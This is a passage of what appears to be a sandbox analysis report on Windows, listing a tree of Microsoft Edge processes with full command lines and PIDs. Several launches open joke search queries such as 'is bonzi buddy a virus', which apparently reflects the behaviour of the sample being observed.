      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,4625585569742250004,3252513417868783451,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
      4⤵
      PID:6556
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,4625585569742250004,3252513417868783451,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
      4⤵
      PID:5024
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,4625585569742250004,3252513417868783451,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4300 /prefetch:1
      4⤵
      PID:2396
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,4625585569742250004,3252513417868783451,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5264 /prefetch:8
      4⤵
      PID:6180
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,4625585569742250004,3252513417868783451,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5264 /prefetch:8
      4⤵
      PID:4324
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,4625585569742250004,3252513417868783451,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3468 /prefetch:1
      4⤵
      PID:1484
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,4625585569742250004,3252513417868783451,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5064 /prefetch:1
      4⤵
      PID:3324
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,4625585569742250004,3252513417868783451,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5040 /prefetch:1
      4⤵
      PID:7048
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,4625585569742250004,3252513417868783451,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4988 /prefetch:1
      4⤵
      PID:2260
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,4625585569742250004,3252513417868783451,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5364 /prefetch:1
      4⤵
      PID:7136
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,4625585569742250004,3252513417868783451,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5764 /prefetch:1
      4⤵
      PID:5744
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,4625585569742250004,3252513417868783451,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5676 /prefetch:1
      4⤵
      PID:6440
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,4625585569742250004,3252513417868783451,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6132 /prefetch:1
      4⤵
      PID:3596
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://search.wow.com/search?q=is+bonzi+buddy+a+virus
    3⤵
    PID:5732
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa90c646f8,0x7ffa90c64708,0x7ffa90c64718
      4⤵
      PID:2952
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=stanky+danky+maymays
    3⤵
    PID:5328
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa90c646f8,0x7ffa90c64708,0x7ffa90c64718
      4⤵
      PID:1980
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://search.yahoo.com/search;?p=snow+halation+midi
    3⤵
    - Enumerates system info in registry
    PID:6776
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0x11c,0x12c,0x7ffa90c646f8,0x7ffa90c64708,0x7ffa90c64718
      4⤵
      PID:1932
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,6368988271576611861,13935299668973012068,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2
      4⤵
      PID:4580
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,6368988271576611861,13935299668973012068,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2384 /prefetch:3
      4⤵
      PID:3496
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,6368988271576611861,13935299668973012068,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3016 /prefetch:8
      4⤵
      PID:516
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,6368988271576611861,13935299668973012068,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
      4⤵
      PID:1816
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,6368988271576611861,13935299668973012068,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
      4⤵
      PID:6928
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,6368988271576611861,13935299668973012068,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4964 /prefetch:1
      4⤵
      PID:5660
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,6368988271576611861,13935299668973012068,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4968 /prefetch:1
      4⤵
      PID:5648
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.bing.com/search?q=myfelix+download
    3⤵
    - Enumerates system info in registry
    PID:6700
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0x120,0x124,0x11c,0x128,0x7ffa90c646f8,0x7ffa90c64708,0x7ffa90c64718
      4⤵
      PID:6992
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:2
      4⤵
      PID:6040
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 /prefetch:3
      4⤵
      PID:3232
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2872 /prefetch:8
      4⤵
      PID:3280
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1
      4⤵
      PID:3768
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3448 /prefetch:1
      4⤵
      PID:5052
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4880 /prefetch:1
      4⤵
      PID:5144
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5092 /prefetch:8
      4⤵
      PID:3548
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5092 /prefetch:8
      4⤵
      PID:5492
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5152 /prefetch:1
      4⤵
      PID:6428
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:1
      4⤵
      PID:644
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5648 /prefetch:1
      4⤵
      PID:4020
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5620 /prefetch:1
      4⤵
      PID:5404
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5156 /prefetch:1
      4⤵
      PID:6068
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5336 /prefetch:1
      4⤵
      PID:5892
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:1
      4⤵
      PID:3388
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5568 /prefetch:1
      4⤵
      PID:4332
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5212 /prefetch:1
      4⤵
      PID:3100
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5360 /prefetch:1
      4⤵
      PID:632
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6188 /prefetch:1
      4⤵
      PID:6128
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6668 /prefetch:1
      4⤵
      PID:6528
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6500 /prefetch:1
      4⤵
      PID:516
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6600 /prefetch:1
      4⤵
      PID:1964
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6744 /prefetch:1
      4⤵
      PID:5112
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6976 /prefetch:1
      4⤵
      PID:436
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5600 /prefetch:1
      4⤵
      PID:4892
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6812 /prefetch:1
      4⤵
      PID:5128
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4868 /prefetch:1
      4⤵
      PID:2796
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4852 /prefetch:1
      4⤵
      PID:7080
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2768 /prefetch:1
      4⤵
      PID:2860
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6608 /prefetch:1
      4⤵
      PID:5384
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6632 /prefetch:1
      4⤵
      PID:6252
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7140 /prefetch:1
      4⤵
      PID:5008
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7088 /prefetch:1
      4⤵
      PID:6064
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7288 /prefetch:1
      4⤵
      PID:6524
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,4191188828693698783,7222678129261767161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.75 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6824 /prefetch:1
      4⤵
      PID:1364
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
